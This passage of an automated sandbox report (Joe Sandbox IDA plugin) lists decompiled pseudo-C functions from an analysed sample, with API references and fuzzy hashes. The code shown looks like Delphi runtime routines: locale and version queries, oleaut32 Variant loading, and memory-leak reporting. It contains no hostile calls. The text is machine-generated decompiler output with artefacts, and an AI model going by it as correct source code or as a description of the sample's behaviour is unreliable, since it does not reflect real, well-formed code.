                                                                                                  					return E028544F4(_t10, _t18);
                                                                                                  				}
                                                                                                  				return E02854590(_t10, _t5 - 1,  &_v260, _t19);
                                                                                                  			}








                                                                                                  APIs
                                                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0285A7C6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: 6a7be2a49ff6658f09632d279ecb7de677017f0ff0439b49a4787070f8f3a681
                                                                                                  • Instruction ID: 0c7d80de5e4b6420817a390adf120a5239a16e0ec3a8f2819450b664fe3d3d30
                                                                                                  • Opcode Fuzzy Hash: 6a7be2a49ff6658f09632d279ecb7de677017f0ff0439b49a4787070f8f3a681
                                                                                                  • Instruction Fuzzy Hash: 37E0D83D70023817D314A96C5C919F6739DD75C310F00427EBD49C7341EDA09D808AE5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0285B770() {
                                                                                                  				char _v128;
                                                                                                  				intOrPtr _v132;
                                                                                                  				signed int _v136;
                                                                                                  				intOrPtr _v140;
                                                                                                  				intOrPtr _v144;
                                                                                                  				int _t7;
                                                                                                  				struct _OSVERSIONINFOA* _t18;
                                                                                                  
                                                                                                  				_t18->dwOSVersionInfoSize = 0x94;
                                                                                                  				_t7 = GetVersionExA(_t18);
                                                                                                  				if(_t7 != 0) {
                                                                                                  					 *0x28777c0 = _v132;
                                                                                                  					 *0x28777c4 = _v144;
                                                                                                  					 *0x28777c8 = _v140;
                                                                                                  					if( *0x28777c0 != 1) {
                                                                                                  						 *0x28777cc = _v136;
                                                                                                  					} else {
                                                                                                  						 *0x28777cc = _v136 & 0x0000ffff;
                                                                                                  					}
                                                                                                  					return E02854710(0x28777d0, 0x80,  &_v128);
                                                                                                  				}
                                                                                                  				return _t7;
                                                                                                  			}











                                                                                                  APIs
                                                                                                  • GetVersionExA.KERNEL32(?,02876106,00000000,0287611E), ref: 0285B77E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Version
                                                                                                  • String ID:
                                                                                                  • API String ID: 1889659487-0
                                                                                                  • Opcode ID: f9222adb8287419d8e47ef7830557a4460cc34ec355375701b8854e52967e642
                                                                                                  • Instruction ID: 4796e6fe32a10305d17db4fee496c742aa80ce7c98e437a56d56226d36325f1b
                                                                                                  • Opcode Fuzzy Hash: f9222adb8287419d8e47ef7830557a4460cc34ec355375701b8854e52967e642
                                                                                                  • Instruction Fuzzy Hash: A8F0B27C9443519FC350DF28E845A15BBE9FB88B95F408D69E999C7380EB34D818CF52
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 79%
                                                                                                  			E0285A7F4(int __eax, signed int __ecx, int __edx) {
                                                                                                  				char _v16;
                                                                                                  				signed int _t5;
                                                                                                  				signed int _t6;
                                                                                                  
                                                                                                  				_push(__ecx);
                                                                                                  				_t6 = __ecx;
                                                                                                  				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                                                                                                  					_t5 = _t6;
                                                                                                  				} else {
                                                                                                  					_t5 = _v16 & 0x000000ff;
                                                                                                  				}
                                                                                                  				return _t5;
                                                                                                  			}







                                                                                                  APIs
                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0285BE56,00000000,0285C06F,?,?,00000000,00000000), ref: 0285A807
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale
                                                                                                  • String ID:
                                                                                                  • API String ID: 2299586839-0
                                                                                                  • Opcode ID: 6184780ab990e1c9c994eeefedfa7bdff7a128ca2a0de256d680c4560d72c245
                                                                                                  • Instruction ID: 17d1a07a22af4429d99c2456eb4f008fbb2a4e3796e87ccbbbf3291f2271807a
                                                                                                  • Opcode Fuzzy Hash: 6184780ab990e1c9c994eeefedfa7bdff7a128ca2a0de256d680c4560d72c245
                                                                                                  • Instruction Fuzzy Hash: 3BD05E6E31E2702AE224515A6D84DBB5ADCCAC67A1F00813EB988C7101E2048C0697B1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E028591F0() {
                                                                                                  				struct _SYSTEMTIME* _t2;
                                                                                                  
                                                                                                  				GetLocalTime(_t2);
                                                                                                  				return _t2->wYear & 0x0000ffff;
                                                                                                  			}





                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LocalTime
                                                                                                  • String ID:
                                                                                                  • API String ID: 481472006-0
                                                                                                  • Opcode ID: b502372fb5b23bac125662bc6bb717f94965c76aef423a1f4f3b06eec63c2f99
                                                                                                  • Instruction ID: 0614c6ddd2df66c4b36abcf4256c09194277fd4d95e51c5834278a7a5c0dc082
                                                                                                  • Opcode Fuzzy Hash: b502372fb5b23bac125662bc6bb717f94965c76aef423a1f4f3b06eec63c2f99
                                                                                                  • Instruction Fuzzy Hash: ABA01108808832028A803B2C0C0223A30C8A800A20FC80B80ACF8802E2FA2E022880E3
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: F
                                                                                                  • API String ID: 0-1304234792
                                                                                                  • Opcode ID: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
                                                                                                  • Instruction ID: 39a05f27351074f96064fb9f4e508700951c33ea825609af86fd471a0efc5636
                                                                                                  • Opcode Fuzzy Hash: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
                                                                                                  • Instruction Fuzzy Hash: 095132B9F142098BEB09CE6DC8907AEF6E7ABC8314F588079D509E7380EB745E058754
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
                                                                                                  • Instruction ID: 8b8fd3fddc1d082cd2261a7b070ad1c8e883e926c58e4d1047d257333d899dce
                                                                                                  • Opcode Fuzzy Hash: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
                                                                                                  • Instruction Fuzzy Hash: A7D1547DA00246AFDB15CFB89C807AABBF7AF09308F1880BAD548D3241E775DA50CB51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: da1b029b2c8cd817535cc31f51fa5df94214df832fd31e041a81918ffc2b5124
                                                                                                  • Instruction ID: 361356259efb29de1d612c9851e0cd3cfc50662e375e4439ef31a38c1add7a0b
                                                                                                  • Opcode Fuzzy Hash: da1b029b2c8cd817535cc31f51fa5df94214df832fd31e041a81918ffc2b5124
                                                                                                  • Instruction Fuzzy Hash: CBA1B33CA00516AFDF05AF2DCC44BBE77A7EFC6314F188164E415EB295CB7499028B66
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 51%
                                                                                                  			E028520C4(void* __eax, char* __edx) {
                                                                                                  				char* _t103;
                                                                                                  
                                                                                                  				_t103 = __edx;
                                                                                                  				_t39 = __eax + 1;
                                                                                                  				 *__edx = 0xffffffff89705f71;
                                                                                                  				asm("sbb edi, 0xffffffff");
                                                                                                  				 *__edx = 0xbadbbd;
                                                                                                  				asm("sbb edi, 0xffffffff");
                                                                                                  				 *__edx = 0xbadbbd;
                                                                                                  				asm("sbb edi, 0xffffffff");
                                                                                                  				 *__edx = 0xbadbbd;
                                                                                                  				asm("sbb edi, 0xffffffff");
                                                                                                  				 *__edx = 0xbadbbd;
                                                                                                  				asm("sbb edi, 0xffffffff");
                                                                                                  				 *__edx = 0xbadbbd;
                                                                                                  				asm("sbb edi, 0xffffffff");
                                                                                                  				 *__edx = 0xbadbbd;
                                                                                                  				asm("sbb edi, 0xffffffff");
                                                                                                  				 *__edx = 0xbadbbd;
                                                                                                  				asm("sbb edi, 0xffffffff");
                                                                                                  				 *__edx = 0xbadbbd;
                                                                                                  				asm("sbb edi, 0xffffffff");
                                                                                                  				 *__edx = ((((((((((__eax + 0x00000001) * 0x89705f41 >> 0x00000020 & 0x1fffffff) + 0xfffffffe25c17d04 + (_t39 * 0x89705f41 >> 0x0000001e) & 0x0fffffff) + 0xfffffffe25c17d04 & 0x07ffffff) + 0xfffffffe25c17d04 & 0x03ffffff) + 0xfffffffe25c17d04 & 0x01ffffff) + 0xfffffffe25c17d04 & 0x00ffffff) + 0xfffffffe25c17d04 & 0x007fffff) + 0xfffffffe25c17d04 & 0x003fffff) + 0xfffffffe25c17d04 & 0x001fffff) + 0xfffffffe25c17d04 >> 0x00000014 | 0x00000030;
                                                                                                  				_t37 = _t103 + 1; // 0x1
                                                                                                  				return _t37;
                                                                                                  			}





                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                  • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                  • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                  • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0285D278() {
                                                                                                  				struct HINSTANCE__* _v8;
                                                                                                  				intOrPtr _t46;
                                                                                                  				void* _t91;
                                                                                                  
                                                                                                  				_v8 = GetModuleHandleA("oleaut32.dll");
                                                                                                  				 *0x28a622c = E0285D24C("VariantChangeTypeEx", E0285CDE4, _t91);
                                                                                                  				 *0x28a6230 = E0285D24C("VarNeg", E0285CE14, _t91);
                                                                                                  				 *0x28a6234 = E0285D24C("VarNot", E0285CE14, _t91);
                                                                                                  				 *0x28a6238 = E0285D24C("VarAdd", E0285CE20, _t91);
                                                                                                  				 *0x28a623c = E0285D24C("VarSub", E0285CE20, _t91);
                                                                                                  				 *0x28a6240 = E0285D24C("VarMul", E0285CE20, _t91);
                                                                                                  				 *0x28a6244 = E0285D24C("VarDiv", E0285CE20, _t91);
                                                                                                  				 *0x28a6248 = E0285D24C("VarIdiv", E0285CE20, _t91);
                                                                                                  				 *0x28a624c = E0285D24C("VarMod", E0285CE20, _t91);
                                                                                                  				 *0x28a6250 = E0285D24C("VarAnd", E0285CE20, _t91);
                                                                                                  				 *0x28a6254 = E0285D24C("VarOr", E0285CE20, _t91);
                                                                                                  				 *0x28a6258 = E0285D24C("VarXor", E0285CE20, _t91);
                                                                                                  				 *0x28a625c = E0285D24C("VarCmp", E0285CE2C, _t91);
                                                                                                  				 *0x28a6260 = E0285D24C("VarI4FromStr", E0285CE38, _t91);
                                                                                                  				 *0x28a6264 = E0285D24C("VarR4FromStr", E0285CEA4, _t91);
                                                                                                  				 *0x28a6268 = E0285D24C("VarR8FromStr", E0285CF10, _t91);
                                                                                                  				 *0x28a626c = E0285D24C("VarDateFromStr", E0285CF7C, _t91);
                                                                                                  				 *0x28a6270 = E0285D24C("VarCyFromStr", E0285CFE8, _t91);
                                                                                                  				 *0x28a6274 = E0285D24C("VarBoolFromStr", E0285D054, _t91);
                                                                                                  				 *0x28a6278 = E0285D24C("VarBstrFromCy", E0285D0D4, _t91);
                                                                                                  				 *0x28a627c = E0285D24C("VarBstrFromDate", E0285D144, _t91);
                                                                                                  				_t46 = E0285D24C("VarBstrFromBool", E0285D1B8, _t91);
                                                                                                  				 *0x28a6280 = _t46;
                                                                                                  				return _t46;
                                                                                                  			}







                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0285D281
                                                                                                    • Part of subcall function 0285D24C: GetProcAddress.KERNEL32(00000000), ref: 0285D265
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                  • API String ID: 1646373207-1918263038
                                                                                                  • Opcode ID: 0fbdd21e251e7a914c403d6d4adf64a2e395937893af145874cfd5f8d11e3f00
                                                                                                  • Instruction ID: 52f32b1145df7c834614cfc81ad9dbe4376f5a2554cf6d81019762ef6830cf2f
                                                                                                  • Opcode Fuzzy Hash: 0fbdd21e251e7a914c403d6d4adf64a2e395937893af145874cfd5f8d11e3f00
                                                                                                  • Instruction Fuzzy Hash: 1D41477DA443355FAA086B6DB400427B7DED784710364801BBE08CB799EEB0FC59DE6A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 98%
                                                                                                  			E02852530(void* __eax, void* __fp0) {
                                                                                                  				void* _v8;
                                                                                                  				char _v110600;
                                                                                                  				char _v112644;
                                                                                                  				char _v112645;
                                                                                                  				signed int _v112652;
                                                                                                  				char _v112653;
                                                                                                  				char _v112654;
                                                                                                  				char _v112660;
                                                                                                  				intOrPtr _v112664;
                                                                                                  				intOrPtr _v112668;
                                                                                                  				intOrPtr _v112672;
                                                                                                  				struct HWND__* _v112676;
                                                                                                  				signed short* _v112680;
                                                                                                  				intOrPtr* _v112684;
                                                                                                  				char _v129068;
                                                                                                  				char _v131117;
                                                                                                  				char _v161836;
                                                                                                  				void* _v162091;
                                                                                                  				signed char _v162092;
                                                                                                  				void* _t73;
                                                                                                  				int _t79;
                                                                                                  				signed int _t126;
                                                                                                  				int _t131;
                                                                                                  				intOrPtr _t132;
                                                                                                  				char* _t134;
                                                                                                  				char* _t135;
                                                                                                  				char* _t136;
                                                                                                  				char* _t137;
                                                                                                  				char* _t138;
                                                                                                  				char* _t139;
                                                                                                  				char* _t141;
                                                                                                  				char* _t142;
                                                                                                  				char* _t147;
                                                                                                  				char* _t148;
                                                                                                  				intOrPtr _t180;
                                                                                                  				void* _t182;
                                                                                                  				void* _t184;
                                                                                                  				void* _t185;
                                                                                                  				intOrPtr* _t188;
                                                                                                  				intOrPtr* _t189;
                                                                                                  				signed int _t194;
                                                                                                  				void* _t197;
                                                                                                  				void* _t198;
                                                                                                  				void* _t211;
                                                                                                  
                                                                                                  				_push(__eax);
                                                                                                  				_t73 = 0x27;
                                                                                                  				goto L1;
                                                                                                  				L12:
                                                                                                  				while(_t180 != 0x28a3708) {
                                                                                                  					_t79 = E02852048(_t180);
                                                                                                  					_t131 = _t79;
                                                                                                  					__eflags = _t131;
                                                                                                  					if(_t131 == 0) {
                                                                                                  						L11:
                                                                                                  						_t180 =  *((intOrPtr*)(_t180 + 4));
                                                                                                  						continue;
                                                                                                  					} else {
                                                                                                  						goto L4;
                                                                                                  					}
                                                                                                  					do {
                                                                                                  						L4:
                                                                                                  						_t194 =  *(_t131 - 4);
                                                                                                  						__eflags = _t194 & 0x00000001;
                                                                                                  						if((_t194 & 0x00000001) == 0) {
                                                                                                  							__eflags = _t194 & 0x00000004;
                                                                                                  							if(__eflags == 0) {
                                                                                                  								__eflags = _v112652 - 0x1000;
                                                                                                  								if(_v112652 < 0x1000) {
                                                                                                  									_v112664 = (_t194 & 0xfffffff0) - 4;
                                                                                                  									_t126 = E0285238C(_t131);
                                                                                                  									__eflags = _t126;
                                                                                                  									if(_t126 == 0) {
                                                                                                  										_v112645 = 0;
                                                                                                  										 *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664;
                                                                                                  										_t18 =  &_v112652;
                                                                                                  										 *_t18 = _v112652 + 1;
                                                                                                  										__eflags =  *_t18;
                                                                                                  									}
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								E028523E4(_t131, __eflags, _t197);
                                                                                                  							}
                                                                                                  						}
                                                                                                  						_t79 = E02852024(_t131);
                                                                                                  						_t131 = _t79;
                                                                                                  						__eflags = _t131;
                                                                                                  					} while (_t131 != 0);
                                                                                                  					goto L11;
                                                                                                  				}
                                                                                                  				_t132 =  *0x28a57b0; // 0x7ebd0000
                                                                                                  				while(_t132 != 0x28a57ac && _v112652 < 0x1000) {
                                                                                                  					_t79 = E0285238C(_t132 + 0x10);
                                                                                                  					__eflags = _t79;
                                                                                                  					if(_t79 == 0) {
                                                                                                  						_v112645 = 0;
                                                                                                  						_t22 = _t132 + 0xc; // 0x80004
                                                                                                  						_t79 = _v112652;
                                                                                                  						 *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
                                                                                                  						_t27 =  &_v112652;
                                                                                                  						 *_t27 = _v112652 + 1;
                                                                                                  						__eflags =  *_t27;
                                                                                                  					}
                                                                                                  					_t29 = _t132 + 4; // 0x7ec50000
                                                                                                  					_t132 =  *_t29;
                                                                                                  				}
                                                                                                  				if(_v112645 != 0) {
                                                                                                  					L48:
                                                                                                  					return _t79;
                                                                                                  				}
                                                                                                  				_v112653 = 0;
                                                                                                  				_v112668 = 0;
                                                                                                  				_t134 = E028521E0(0x28,  &_v161836);
                                                                                                  				_v112660 = 0x37;
                                                                                                  				_v112680 = 0x2877042;
                                                                                                  				_v112684 =  &_v110600;
                                                                                                  				do {
                                                                                                  					_v112672 = ( *_v112680 & 0x0000ffff) - 4;
                                                                                                  					_v112654 = 0;
                                                                                                  					_t182 = 0xff;
                                                                                                  					_t188 = _v112684;
                                                                                                  					while(_t134 <=  &_v131117) {
                                                                                                  						if( *_t188 > 0) {
                                                                                                  							if(_v112653 == 0) {
                                                                                                  								_t134 = E028521E0(0x27, _t134);
                                                                                                  								_v112653 = 1;
                                                                                                  							}
                                                                                                  							if(_v112654 != 0) {
                                                                                                  								 *_t134 = 0x2c;
                                                                                                  								_t139 = _t134 + 1;
                                                                                                  								 *_t139 = 0x20;
                                                                                                  								_t140 = _t139 + 1;
                                                                                                  								__eflags = _t139 + 1;
                                                                                                  							} else {
                                                                                                  								 *_t134 = 0xd;
                                                                                                  								 *((char*)(_t134 + 1)) = 0xa;
                                                                                                  								_t147 = E028520C4(_v112668 + 1, _t134 + 2);
                                                                                                  								 *_t147 = 0x20;
                                                                                                  								_t148 = _t147 + 1;
                                                                                                  								 *_t148 = 0x2d;
                                                                                                  								 *((char*)(_t148 + 1)) = 0x20;
                                                                                                  								_t140 = E028521E0(8, E028520C4(_v112672, _t148 + 2));
                                                                                                  								_v112654 = 1;
                                                                                                  							}
                                                                                                  							_t211 = _t182 - 1;
                                                                                                  							if(_t211 < 0) {
                                                                                                  								_t141 = E028521E0(7, _t140);
                                                                                                  							} else {
                                                                                                  								if(_t211 == 0) {
                                                                                                  									_t141 = E028521E0(6, _t140);
                                                                                                  								} else {
                                                                                                  									E0285363C( *((intOrPtr*)(_t188 - 4)),  &_v162092);
                                                                                                  									_t141 = E028521E0(_v162092 & 0x000000ff, _t140);
                                                                                                  								}
                                                                                                  							}
                                                                                                  							 *_t141 = 0x20;
                                                                                                  							_t142 = _t141 + 1;
                                                                                                  							 *_t142 = 0x78;
                                                                                                  							 *((char*)(_t142 + 1)) = 0x20;
                                                                                                  							_t134 = E028520C4( *_t188, _t142 + 2);
                                                                                                  						}
                                                                                                  						_t182 = _t182 - 1;
                                                                                                  						_t188 = _t188 - 8;
                                                                                                  						if(_t182 != 0xffffffff) {
                                                                                                  							continue;
                                                                                                  						} else {
                                                                                                  							goto L37;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					L37:
                                                                                                  					_v112668 = _v112672;
                                                                                                  					_v112684 = _v112684 + 0x800;
                                                                                                  					_v112680 =  &(_v112680[0x10]);
                                                                                                  					_t60 =  &_v112660;
                                                                                                  					 *_t60 = _v112660 - 1;
                                                                                                  				} while ( *_t60 != 0);
                                                                                                  				if(_v112652 <= 0) {
                                                                                                  					L47:
                                                                                                  					E028521E0(3, _t134);
                                                                                                  					_t79 = MessageBoxA(0,  &_v161836, "Unexpected Memory Leak", 0x2010);
                                                                                                  					goto L48;
                                                                                                  				}
                                                                                                  				if(_v112653 != 0) {
                                                                                                  					 *_t134 = 0xd;
                                                                                                  					_t136 = _t134 + 1;
                                                                                                  					 *_t136 = 0xa;
                                                                                                  					_t137 = _t136 + 1;
                                                                                                  					 *_t137 = 0xd;
                                                                                                  					_t138 = _t137 + 1;
                                                                                                  					 *_t138 = 0xa;
                                                                                                  					_t134 = _t138 + 1;
                                                                                                  				}
                                                                                                  				_t134 = E028521E0(0x3c, _t134);
                                                                                                  				_t184 = _v112652 - 1;
                                                                                                  				if(_t184 >= 0) {
                                                                                                  					_t185 = _t184 + 1;
                                                                                                  					_v112676 = 0;
                                                                                                  					_t189 =  &_v129068;
                                                                                                  					L43:
                                                                                                  					L43:
                                                                                                  					if(_v112676 != 0) {
                                                                                                  						 *_t134 = 0x2c;
                                                                                                  						_t135 = _t134 + 1;
                                                                                                  						 *_t135 = 0x20;
                                                                                                  						_t134 = _t135 + 1;
                                                                                                  					}
                                                                                                  					_t134 = E028520C4( *_t189, _t134);
                                                                                                  					if(_t134 >  &_v131117) {
                                                                                                  						goto L47;
                                                                                                  					}
                                                                                                  					_v112676 =  &(_v112676->i);
                                                                                                  					_t189 = _t189 + 4;
                                                                                                  					_t185 = _t185 - 1;
                                                                                                  					if(_t185 != 0) {
                                                                                                  						goto L43;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				L1:
                                                                                                  				_t198 = _t198 + 0xfffff004;
                                                                                                  				_push(_t73);
                                                                                                  				_t73 = _t73 - 1;
                                                                                                  				if(_t73 != 0) {
                                                                                                  					goto L1;
                                                                                                  				} else {
                                                                                                  					E02853098( &_v112644, 0x1b800);
                                                                                                  					E02853098( &_v129068, 0x4000);
                                                                                                  					_t79 = 0;
                                                                                                  					_v112652 = 0;
                                                                                                  					_v112645 = 1;
                                                                                                  					_t180 =  *0x28a370c; // 0x3fd0000
                                                                                                  					goto L12;
                                                                                                  				}
                                                                                                  			}
                                                                                                  0x00000000
                                                                                                  0x028528a8
                                                                                                  0x02852539
                                                                                                  0x02852539
                                                                                                  0x0285253f
                                                                                                  0x02852540
                                                                                                  0x02852541
                                                                                                  0x00000000
                                                                                                  0x02852543
                                                                                                  0x0285255c
                                                                                                  0x0285256e
                                                                                                  0x02852573
                                                                                                  0x02852575
                                                                                                  0x0285257b
                                                                                                  0x02852582
                                                                                                  0x00000000
                                                                                                  0x02852582

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
